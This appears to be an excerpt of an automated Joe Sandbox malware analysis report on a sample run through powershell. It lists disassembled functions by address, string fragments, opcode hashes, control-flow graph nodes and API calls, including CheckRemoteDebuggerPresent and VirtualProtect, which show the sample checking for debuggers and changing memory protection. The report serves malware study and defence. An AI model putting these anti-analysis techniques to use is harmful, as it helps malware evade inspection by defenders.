                                                                                          • Instruction Fuzzy Hash: AFA147B2724356AFCB24DA78C801766BFA6AFC6710F1484ABE545CB293CB31CD41C7A1
                                                                                          Function 00A6EC08 Relevance: 10.2, Strings: 8, Instructions: 162COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,jq$0omp$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-3782670052
                                                                                          • Opcode ID: 517ed85412c2cdd413467349ee587454520d18da69b1f3b4c127bfe2a4940cd0
                                                                                          • Instruction ID: a07cc9785ee729322a5d780c06b92a7283871970d947e596547c8a96de5dea1a
                                                                                          • Opcode Fuzzy Hash: 517ed85412c2cdd413467349ee587454520d18da69b1f3b4c127bfe2a4940cd0
                                                                                          • Instruction Fuzzy Hash: B8414278344115CFCB29EB79D89557E3BBA7F8DB9032418AAD152CF3A2DE10CC409796
                                                                                          Function 00A6EDE8 Relevance: 9.2, Strings: 7, Instructions: 455COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0omp$0omp$0omp$`Qfq$$fq$$fq$$fq
                                                                                          • API String ID: 0-4019838557
                                                                                          • Opcode ID: c68c6464c019a2e5925c9578ac680d68a22423d7f9f491d5823aa2481b0314bc
                                                                                          • Instruction ID: 1b287f0e580d48d812264306f97493832c63957b4b3b7c4521585f1107c70ea4
                                                                                          • Opcode Fuzzy Hash: c68c6464c019a2e5925c9578ac680d68a22423d7f9f491d5823aa2481b0314bc
                                                                                          • Instruction Fuzzy Hash: E5E1E4747102108FDB24AB7DA86562E77F6AFC9B10B2544BAD906DF3A5EE30CC418792
                                                                                          Function 072A3678 Relevance: 8.9, Strings: 7, Instructions: 192COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-1664963280
                                                                                          • Opcode ID: 319592fa282a9b644fda8bdd954242d54f7df42eae711d88a5f4a8cb805874e8
                                                                                          • Instruction ID: 1f6367371da083a7fee04fbacf15f20eba6d97504704a127fe59a94ca1d2c5c8
                                                                                          • Opcode Fuzzy Hash: 319592fa282a9b644fda8bdd954242d54f7df42eae711d88a5f4a8cb805874e8
                                                                                          • Instruction Fuzzy Hash: 8F5137F5724347AFCB25CA798811766BFA6AFC2710F2480ABD545CB243DB31C881C7A2
                                                                                          Function 00A67A21 Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: 2e4d393e5eb1390909d3e6225ec64523f6da5ec972ba3042ff77ad0004be406d
                                                                                          • Instruction ID: 777d36b0ef1c0045b6a0af5ce056a88f971d7e01a93ee8e9c4e579c08da7fb44
                                                                                          • Opcode Fuzzy Hash: 2e4d393e5eb1390909d3e6225ec64523f6da5ec972ba3042ff77ad0004be406d
                                                                                          • Instruction Fuzzy Hash: 3EB1C874E016099FCB54DFA9D990A9EFBF2FF88304F108629E419AB345DB30A945CF91
                                                                                          Function 00A67A30 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: da3576a1f224af271c996a98d34dddc3caf2ef3c9078daf7df014b9c135ddd9d
                                                                                          • Instruction ID: 222e4b57c311587e993aa34efbdb23bfe8d1127e77da70a5b21dbea72580075e
                                                                                          • Opcode Fuzzy Hash: da3576a1f224af271c996a98d34dddc3caf2ef3c9078daf7df014b9c135ddd9d
                                                                                          • Instruction Fuzzy Hash: 17B1B774E006099FCB54DFA9D980A9EFBF2FF48304F108629E419AB345DB30A945CF91
                                                                                          Function 072A390A Relevance: 5.1, Strings: 4, Instructions: 95COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: tPfq$$fq$$fq$$fq
                                                                                          • API String ID: 0-3039766666
                                                                                          • Opcode ID: 871bb135faa50f6bee6bce604ecf38b87948f0877df2e6166e1a07d03585c94c
                                                                                          • Instruction ID: 1dd472833e5ad3225124e6ae33e4b57a349f078802151718777f3b552e3c23df
                                                                                          • Opcode Fuzzy Hash: 871bb135faa50f6bee6bce604ecf38b87948f0877df2e6166e1a07d03585c94c
                                                                                          • Instruction Fuzzy Hash: 193105B2619386AFC726CF348811AA57FB9AF46320F19419BE444CF2A3C635CD44C762
                                                                                          Function 072A5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-2113499236
                                                                                          • Opcode ID: d606180cc5d668bb5accd738a78bf6d5b6e0748ab024f624ff484da24295918e
                                                                                          • Instruction ID: 80c9783bf52f519c31ff4dc87e131ea91eb2744d6185a7a87a651a7b1324b6a1
                                                                                          • Opcode Fuzzy Hash: d606180cc5d668bb5accd738a78bf6d5b6e0748ab024f624ff484da24295918e
                                                                                          • Instruction Fuzzy Hash: 582147B2730317BFDB38597F8801727BB9B9FC0715F24802AA509DB681ED75C8918361
                                                                                          Function 072A030A Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq
                                                                                          • API String ID: 0-2206495126
                                                                                          • Opcode ID: 2968c0f4e493e1f7bc3551e92f17ca236c8819180161c186282fe3e063da74e5
                                                                                          • Instruction ID: 20dcddfd06d37ed135cd45da4342ddedfdeacdbefd8d8ba588a02857de94319d
                                                                                          • Opcode Fuzzy Hash: 2968c0f4e493e1f7bc3551e92f17ca236c8819180161c186282fe3e063da74e5
                                                                                          • Instruction Fuzzy Hash: CD012B60B2D3829FC736166808216677FB66FC2310F1900DBD040CB293DB384D45C367

                                                                                          Execution Graph

                                                                                          Execution Coverage:10.4%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:24
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 5081 6412c50 5082 6412c6e 5081->5082 5085 6412dd0 5082->5085 5089 6412e08 5085->5089 5092 6412e02 5085->5092 5086 6412cbb 5090 6412e4c CheckRemoteDebuggerPresent 5089->5090 5091 6412e8e 5090->5091 5091->5086 5093 6412e4c CheckRemoteDebuggerPresent 5092->5093 5094 6412e8e 5093->5094 5094->5086 5077 32f8b40 5078 32f8b80 CloseHandle 5077->5078 5080 32f8bb1 5078->5080 5095 32f0850 5096 32f0859 5095->5096 5099 32f34bd 5095->5099 5102 32f3be2 5095->5102 5105 32f88c0 5099->5105 5104 32f88c0 VirtualProtect 5102->5104 5103 32f3bf8 5104->5103 5107 32f88d3 5105->5107 5109 32f8970 5107->5109 5110 32f89b8 VirtualProtect 5109->5110 5112 32f34d6 5110->5112

                                                                                          Executed Functions

                                                                                          Function 064D8C18 Relevance: 11.3, Strings: 7, Instructions: 2546COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 64d8c18-64d8c83 call 64d0040 call 64dbf28 6 64d8c89-64dbec4 0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: b363dcdde01199b11cd94f3b1cebc1adb7d54b08deb0031474eb074ab548101f
                                                                                          • Instruction ID: fd6bc494f9e0fd27575cd0b8196bb11918516f3916c412f1cdfda7cadbb2e77f
                                                                                          • Opcode Fuzzy Hash: b363dcdde01199b11cd94f3b1cebc1adb7d54b08deb0031474eb074ab548101f
                                                                                          • Instruction Fuzzy Hash: 4753FB78A01219CFDB64DF28C99569EBBB2FB8C701F5081E9D809A7354DB349E85CF90
                                                                                          Function 064D4DC3 Relevance: 3.9, Strings: 3, Instructions: 140COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 522 64d4dc3 523 64d4dc7-64d4dc9 522->523 524 64d4dca-64d4dcd 523->524 525 64d4dce-64d4dd3 524->525 526 64d4e59-64d4e67 524->526 525->526 527 64d502c-64d503e 525->527 528 64d4e2e-64d4e3a 525->528 529 64d4eab-64d4ee5 525->529 530 64d4eea 525->530 531 64d5040 525->531 532 64d4f9d-64d4fcb 525->532 533 64d4e3c-64d4e4d 525->533 534 64d4f7f-64d4f8d 525->534 535 64d501e-64d5020 525->535 536 64d4e79-64d4ea6 525->536 537 64d4fdb-64d4fee 525->537 538 64d4dda-64d4e14 525->538 539 64d4e16-64d4e29 525->539 526->534 552 64d4e6d-64d4e74 526->552 545 64d500c-64d5015 527->545 528->524 529->524 551 64d4ef6-64d4f7a 530->551 532->530 564 64d4fd1-64d4fd6 532->564 533->528 554 64d4e4f-64d4e54 533->554 534->536 555 64d4f93-64d4f98 534->555 535->531 540 64d5022-64d502a 535->540 536->524 541 64d4ff0-64d5002 537->541 538->524 539->541 540->545 541->545 545->527 553 64d5017 545->553 551->524 552->523 553->527 553->531 553->535 554->524 555->524 564->524
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq$`Qfq
                                                                                          • API String ID: 0-872445281
                                                                                          • Opcode ID: 9b2313d7dc3f2f3c4ba740fa33a9336af87a541bd33e2020d545e8a7a82f1f43
                                                                                          • Instruction ID: 94bf45ed8772aaf811f73d660a430dcc41ec5e649f5d92bf1316a7c098c1283e
                                                                                          • Opcode Fuzzy Hash: 9b2313d7dc3f2f3c4ba740fa33a9336af87a541bd33e2020d545e8a7a82f1f43
                                                                                          • Instruction Fuzzy Hash: DE519E74E01218CFDB658F64D8A4BADB7F1FB45300F40419AE40AA7399CF345E828F41
                                                                                          Function 06412E02 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 767 6412e02-6412e8c CheckRemoteDebuggerPresent 769 6412e95-6412ed0 767->769 770 6412e8e-6412e94 767->770 770->769
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 06412E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2309772689.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_6410000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: c98871ba4434edf8f106003a35bf6bc53a6632f6d831263fc3d58b6116e77fa7
                                                                                          • Instruction ID: 0bd4fd5e2a13709e32cef6606f20b965167f2c1e9d87279da83cf43351cfb224
                                                                                          • Opcode Fuzzy Hash: c98871ba4434edf8f106003a35bf6bc53a6632f6d831263fc3d58b6116e77fa7
                                                                                          • Instruction Fuzzy Hash: 8A214AB5C012598FCB10CFA9D585BEEBBF4AF48310F14845AE459E7341D3789A44CF61
                                                                                          Function 06412E08 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 773 6412e08-6412e8c CheckRemoteDebuggerPresent 775 6412e95-6412ed0 773->775 776 6412e8e-6412e94 773->776 776->775
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 06412E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2309772689.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_6410000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 38e0b93a26c21aff9e24a1a2f6232db2a176b976cea361aead24ec20170e5045
                                                                                          • Instruction ID: b36cfd4f00f91e243158502a71a66de47927a72140229f736c1bcf583f19f984
                                                                                          • Opcode Fuzzy Hash: 38e0b93a26c21aff9e24a1a2f6232db2a176b976cea361aead24ec20170e5045
                                                                                          • Instruction Fuzzy Hash: AC2128B5C002598FCB10CF9AD885BEEBBF4AF48320F14845AE459A7350D778AA44CF61
                                                                                          Function 032F8970 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 779 32f8970-32f89f1 VirtualProtect 782 32f89fa-32f8a1f 779->782 783 32f89f3-32f89f9 779->783 783->782
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 032F89E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2239198444.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_32f0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 35b238f11d85b17248a0fa0ec5db241a61b89bb4e43191b10a1ead82e0131ad3
                                                                                          • Instruction ID: 428cdc5039703f6647f9562b459d395b51a4ec2aacd56880ce2505b29f88dc80
                                                                                          • Opcode Fuzzy Hash: 35b238f11d85b17248a0fa0ec5db241a61b89bb4e43191b10a1ead82e0131ad3
                                                                                          • Instruction Fuzzy Hash: 431136B1D003098FCB10DFAAC881AAEFBF4FF48320F14842AD519A7200C775A940CFA1
                                                                                          Function 064DBF50 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1011 64dbf50-64dbf74 1012 64dbfdc-64dbfe3 1011->1012 1013 64dbf76-64dbfd4 1011->1013 1014 64dbfe5-64dc019 1012->1014 1015 64dc056-64dc067 1012->1015 1013->1012 1022 64dc021-64dc04a 1014->1022 1016 64dc06e-64dc090 1015->1016 1017 64dc069 1015->1017 1025 64dc0ff-64dc194 call 64d7550 1016->1025 1026 64dc092-64dc09b 1016->1026 1017->1016 1049 64dc1fc-64dc24e 1022->1049 1050 64dc050 1022->1050 1038 64dc1b5-64dc1bb 1025->1038 1028 64dc09d-64dc0a2 1026->1028 1029 64dc0aa-64dc0b0 1026->1029 1028->1029 1033 64dc0b6-64dc0ba 1029->1033 1034 64dc1b0 1029->1034 1033->1025 1037 64dc0bc-64dc0c5 1033->1037 1034->1038 1040 64dc0d4-64dc0da 1037->1040 1041 64dc0c7-64dc0cc 1037->1041 1043 64dc1bd 1038->1043 1044 64dc1c5 1038->1044 1040->1034 1046 64dc0e0-64dc0fa 1040->1046 1041->1040 1043->1044 1044->1049 1046->1038 1059 64dc250-64dc256 1049->1059 1050->1015 1060 64dc25c 1059->1060 1061 64ddfda-64ddfde 1059->1061 1060->1061 1062 64ddfe4-64ddfef 1061->1062 1063 64dec87-64deca0 1061->1063 1062->1059 1069 64dec7e-64dec84 1063->1069 1070 64deca2-64deca7 1063->1070 1069->1063
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: eba1ea71beb4a5b544d4a12dff8b515c78434cef15b7a19070b136469faef095
                                                                                          • Instruction ID: c0c8a7afdbcc595b6848ae846350673dae2cf7afef79d73b4500804948f78c0e
                                                                                          • Opcode Fuzzy Hash: eba1ea71beb4a5b544d4a12dff8b515c78434cef15b7a19070b136469faef095
                                                                                          • Instruction Fuzzy Hash: 0C910470A002048FDB55DF68C594AAEBBF6FF8A710F51866AE4159B3A1DB35EC01CF90
                                                                                          Function 032F8B40 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1096 32f8b40-32f8baf CloseHandle 1099 32f8bb8-32f8bdd 1096->1099 1100 32f8bb1-32f8bb7 1096->1100 1100->1099
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2239198444.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_32f0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: b7de4902958298be844e0d11b4d9c06a527259874326ba68101d4f9a35c331cf
                                                                                          • Instruction ID: 82e0a8e78d2ede10409d138c564a4d892cbe35f7cda785fe2b76e3c510014f79
                                                                                          • Opcode Fuzzy Hash: b7de4902958298be844e0d11b4d9c06a527259874326ba68101d4f9a35c331cf
                                                                                          • Instruction Fuzzy Hash: 2A113AB5D003498FDB20DFAAC44579EFBF5EF88324F248429D519A7240C775A540CBA1
                                                                                          Function 064DFC10 Relevance: .2, Instructions: 166COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2c5cecf9306399bdf064bba7ef4023f93ce0e59f17e9e9d6d3bdc6e8dc3daac8
                                                                                          • Instruction ID: 4567203ce3bc18528a06f00a93ef5511d44c55bc8315ef68519a84237b074d59
                                                                                          • Opcode Fuzzy Hash: 2c5cecf9306399bdf064bba7ef4023f93ce0e59f17e9e9d6d3bdc6e8dc3daac8
                                                                                          • Instruction Fuzzy Hash: 4851437CB105408FE798AF64E4A56AE7BE7EB8CB01F504529E906D7384CF389C058B91
                                                                                          Function 064D7B70 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 882b9743ee04ffbed707a4d5d0a42601deaa15efd34afdc2752579b85e674113
                                                                                          • Instruction ID: f5d16d67c39d1ad5b70c3a2ab3591b64656aaebc49fc8772c5c170bcf72be865
                                                                                          • Opcode Fuzzy Hash: 882b9743ee04ffbed707a4d5d0a42601deaa15efd34afdc2752579b85e674113
                                                                                          • Instruction Fuzzy Hash: 08314974600109CFE315AF64E0986AFBBB6FBCDB01F90452AD54297388CF386D018BE1
                                                                                          Function 064D17FF Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: db7bd10019935bee8565aeb87dd83f5d96fe57b46c4cae9e4a6416c9c090fdd5
                                                                                          • Instruction ID: 374a88bad2b7c6ac9ea79a82babced9cd5655045fd6c3b1cd46b553f055f9ae3
                                                                                          • Opcode Fuzzy Hash: db7bd10019935bee8565aeb87dd83f5d96fe57b46c4cae9e4a6416c9c090fdd5
                                                                                          • Instruction Fuzzy Hash: AA018F749003099FD755DF24D89879A7BB2FF89600F4080E99409A7205DB34AE41CF14
                                                                                          Function 064DFB20 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3717290f97f294f9847703f79be249c56c10a4918619f7704f7d7cfb2d21d7c
                                                                                          • Instruction ID: e9a5ac030e17c99ef209e233fbe5d614733532ca46c737861de288629d8665b8
                                                                                          • Opcode Fuzzy Hash: a3717290f97f294f9847703f79be249c56c10a4918619f7704f7d7cfb2d21d7c
                                                                                          • Instruction Fuzzy Hash: E6F0B4347106408BE3A8AF24E4761BA3B6AFB88F43B404429D403873C6CF35AC00C7D5
                                                                                          Function 064D0ACB Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 598b4270e2a22ea18a5d691f99838ac38059dce4367b7c423a6d862509a2763d
                                                                                          • Instruction ID: 41b149af047a15f1da5d3de797531c3e76794288dbfbf68dab07b46be4845224
                                                                                          • Opcode Fuzzy Hash: 598b4270e2a22ea18a5d691f99838ac38059dce4367b7c423a6d862509a2763d
                                                                                          • Instruction Fuzzy Hash: 0FF06774E00218CFE7A19F14D89879E7772FB46601F408196E00AA3344CA30AE868F55
                                                                                          Function 064D504F Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: df94080b5a26af0d445ff3a3e163b26e72723a7b5d0f5eb2a68bd8e093541772
                                                                                          • Instruction ID: 3fe77f6e36cb4a98cbd13b4687922d379b470548e8b119cdca2d108522f5a04a
                                                                                          • Opcode Fuzzy Hash: df94080b5a26af0d445ff3a3e163b26e72723a7b5d0f5eb2a68bd8e093541772
                                                                                          • Instruction Fuzzy Hash: BEE0C2B4A0021CDFD794DF14D89979EBBB1FB49201F5081DAA509A3344DB302E89CF55
                                                                                          Function 064D5043 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: df94080b5a26af0d445ff3a3e163b26e72723a7b5d0f5eb2a68bd8e093541772
                                                                                          • Instruction ID: 3fe77f6e36cb4a98cbd13b4687922d379b470548e8b119cdca2d108522f5a04a
                                                                                          • Opcode Fuzzy Hash: df94080b5a26af0d445ff3a3e163b26e72723a7b5d0f5eb2a68bd8e093541772
                                                                                          • Instruction Fuzzy Hash: BEE0C2B4A0021CDFD794DF14D89979EBBB1FB49201F5081DAA509A3344DB302E89CF55
                                                                                          Function 064D7D28 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 375d99b0bb9fa9005ac25889d762cdc57a35d7bbc600549ed826d56b7274d19a
                                                                                          • Instruction ID: 8f8f5c8361471326cc036593ba311523c84f9fc144ac55c4a827f7ca2569dcdb
                                                                                          • Opcode Fuzzy Hash: 375d99b0bb9fa9005ac25889d762cdc57a35d7bbc600549ed826d56b7274d19a
                                                                                          • Instruction Fuzzy Hash: 4AD05E7180020CEBCB00EFB0D94445E7BF8DB09250B1044EA9405D7211ED329A005B91
                                                                                          Function 064D5134 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e19acb92b8c23b7e9e59e7eb8ac4498884c9b59c800045adad1728fd28dca74
                                                                                          • Instruction ID: 71590188611d74c81168fa0905f1fce4b615d870ee0cbe20eba96b1e8c22ede7
                                                                                          • Opcode Fuzzy Hash: 4e19acb92b8c23b7e9e59e7eb8ac4498884c9b59c800045adad1728fd28dca74
